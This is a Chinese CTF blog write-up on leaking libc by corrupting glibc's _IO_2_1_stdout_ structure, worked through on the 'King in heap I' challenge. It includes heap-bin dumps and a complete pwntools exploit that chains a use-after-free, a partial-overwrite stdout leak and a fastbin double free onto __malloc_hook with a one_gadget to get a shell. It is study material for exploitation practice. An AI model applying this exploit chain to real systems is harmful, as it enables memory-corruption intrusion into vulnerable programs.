利用_IO_2_1_stdout_泄露libc

2021-10-01

利用 `_IO_2_1_stdout_`泄露libc

感觉现在打stdout也比较常见了，遇见了就学一下。一般来说是需要爆破的，而且因为不同版本ASLR的不同，成功的可能性也有所不同。ubuntu16下是1/16，18下是1/4096。如果只能爆破的话最好用try-except语句。

1. FILE 结构体

这两条命令可以看stdout结构体，再看puts和printf的执行流程大致理解为什么我们要劫持 _IO_2_1_stdout_的_flags、_IO_write_base、_IO_write_ptr ，并篡改为p64(0xfbad1800)+p64(0)*3+'\x00'

1 2	pwndbg> p stdout pwndbg> ptype stdout

因为ctf中一直都是用这一个payload就能leak，结构和函数就不再赘述。

2. 原理

为了泄露处一些libc上的地址，我们需要修改 _IO_2_1_stdout_的_flags、_IO_write_base、_IO_write_ptr。步骤如下：

一般我们将_flags设置为0xfbad18**。目的是为了设置_IO_CURRENTLY_PUTTING=0x800，_IO_IS_APPENDING=0x1000，IO_MAGIC=0xFBAD0000
设置_IO_write_base指向想要泄露的地方；_IO_write_ptr指向泄露结束的地址。
之后遇到puts或printf，就会将_IO_write_base指向的内容打印出来。

3. 利用

一般都是利用unsorted bin的在tcache或fastbin的fd上main_arena的地址(同一个chunk既在unsortbin上，也在tcache上)，配合UAF之类的漏洞覆盖低位爆破stdout的地址，然后分配到stdout结构体处，达到泄露的目的。

但是，不是直接正好分配到stdout上，而是分配到stdout-0x43的的地方因为这里正好有合适的chunk，因此一般来说成功非预期申请之后payloads是'a'*0x33+p64(0xfbad1800)+p64(0)*3+'\x00'。这个地方在2.23中有比较固定的offset，即低3bytes为dd*5 ，*号处有16种可能，但是知道printf的低3byte就知道了，因为偏移是固定的。

4. 例题

UAF

2021 长城杯 King in heap I

逆向分析：libc-2.23，增删改，给出了printf的低三byte，因此不需要爆破；存在UAF。

我们fake一个chunk，通过uaf将其放入fastbin中，然后申请出来，就可以修改真chunk的size位，将真的FB Chunk放入UB之中，这样就可以在FB中连接到main arena + 88

#fake chunk
add(0,0x10)
edit(0,p64(0)+p64(0x41)) # fake chunk
add(1,0x60)
edit(1,p64(0)*5+p64(0x41)) # bypass
add(2,0x30)
add(3,0x30)
add(4,0x30)
delete(1)# put chunk 1 into FB
delete(2)
delete(3)# 3 -> 2
edit(3,p8(0x10)) # fake fd; chunk 3 -> fake chunk

此时的bin情况如下

1
2
3

fastbins
0x40: 0x559a289f20d0 —▸ 0x559a289f2010 ◂— 0x0 #chunk3 -> fake chunk
0x70: 0x559a289f2020 ◂— 0x0 #chunk 1

#get main arena
add(3,0x30)
edit(3,p8(0x10))
add(2,0x30) # fake chunk
edit(2,p64(0)+p64(0x70+0x41)) # fake chunk 1 size to get into UB
delete(1)

此时的bin情况如下

fastbins
0x70: 0x559a289f2020 —▸ 0x7f4581421b78 (main_arena+88) ◂— 0x559a289f2020
unsortedbin
all: 0x559a289f2020 —▸ 0x7f4581421b78 (main_arena+88) ◂— 0x559a289f2020

于是我们就可以通过覆盖地位申请到 stdout - 0x43的位置了

#hijack stdout
edit(2,p64(0)+p64(0x71))#restore chunk 1 size to malloc chunk1
edit(1,'\xdd'+p8(low))  #overwrite the low bytes
add(1,0x60)             #malloc chunk 1
add(5,0x60)				#malloc stdout - 0x43
edit(5,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0))
#hijack stdout to leak libc

于是等到下一次执行puts或者printf的时候就能够leak libc了。它会leak出来一大堆东西，所以接收一般是这样的

p.recv(0x40)
leak = u64(p.recv(8))
libcbase = leak - 0x3c5600
prt('libcbase')

1	[*] libcbase==>0x7f737e67f000

接下来正常df做法就行，值得注意的是，打完stdout之后IO会有所不同（换行符），需要重写交互

完整exp如下：

from pwn import *

elf_path = './pwn'
elf = ELF(elf_path)
libc = ELF('./libc.so.6')
context.binary = elf
context.log_level = 'debug'
#context.timeout = 0.2

p = process(elf_path)
#p = remote('47.0x60.175.110',20066)
one_gadget=[0x45226,0x4527a,0xf03a4,0xf1247]

sda = lambda x,y:p.sendlineafter(x,y)
sdl = lambda x:p.sendline(x)
rct = lambda x:p.recvuntil(x)
prt = lambda x:log.info('\x1b[01;38;5;214m' + x + '==>' + hex(eval(x)) + '\x1b[0m')

def leak():
	sda(">> \n","666")
	leak = int(p.recvuntil('\n',drop = True),16)
	return leak

def add(idx,size,ct='\x00'):
	sda(">> \n","1")
	sda("index:\n",str(idx))
	sda("size:\n",str(size))

def delete(idx):
	sda(">> \n","2")
	sda("index:\n",str(idx))

def edit(idx,ct):
	sda(">> \n","3")
	sda("index:\n",str(idx))
	sda("context:\n",ct)
    
def add2(idx,size,ct='\x00'):
	sda(">> ","1")
	sda("index:",str(idx))
	sda("size:",str(size))

def delete2(idx):
	sda(">> ","2")
	sda("index:",str(idx))

def edit2(idx,ct):
	sda(">> ","3")
	sda("index:",str(idx))
	sda("context:",ct)

#gdb.attach(p,'b *$rebase(0x000E24)')
#=========================leak=============================
leak_addr = leak()
prt('leak_addr')
low = ((leak_addr>>8)&0xf0) + 5
prt('low')

#fake chunk
add(0,0x10)
edit(0,p64(0)+p64(0x41)) # fake chunk
add(1,0x60)
edit(1,p64(0)*5+p64(0x41)) # bypass
add(2,0x30)
add(3,0x30)
add(4,0x30)
delete(1)# put chunk 1 into FB
delete(2)
delete(3)# 3 -> 2
edit(3,p8(0x10)) # fake fd; chunk 3 -> fake chunk
#gdb.attach(p)

#get main arena
add(3,0x30)
edit(3,p8(0x10))
add(2,0x30) # fake chunk
edit(2,p64(0)+p64(0x70+0x41)) # fake chunk 1size to get into UB
delete(1)
#gdb.attach(p)

#hijack stdout
edit(2,p64(0)+p64(0x71))#restore chunk 1 size to malloc chunk1
edit(1,'\xdd'+p8(low))  #overwrite the low bytes
add(1,0x60)             #malloc chunk 1
#gdb.attach(p)
#edit(1,p16(0x2620-0x43))
add(5,0x60)
edit(5,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0))
p.recv(0x40)
leak = u64(p.recv(8))
libcbase = leak - 0x3c5600
prt('libcbase')
malloc_hook = libcbase + libc.sym['__malloc_hook']
one = libcbase + one_gadget[1]
#gdb.attach(p)
#========================attack============================
add2(3,0x60)
add2(4,0x60)
delete2(3)
delete2(4)
delete2(3)
add2(5,0x60)
edit2(5,p64(libcbase+libc.symbols['__malloc_hook']-0x23))#5
add2(6,0x60)
add2(7,0x60)
add2(8,0x60)
edit2(8,'\x00'*0xb+p64(one)+p64(libcbase+libc.symbols['__libc_realloc']+8))
sda(">> ","1")
sda("index:",'9')
sda("size:",'0x60')
#gdb.attach(p)
p.interactive()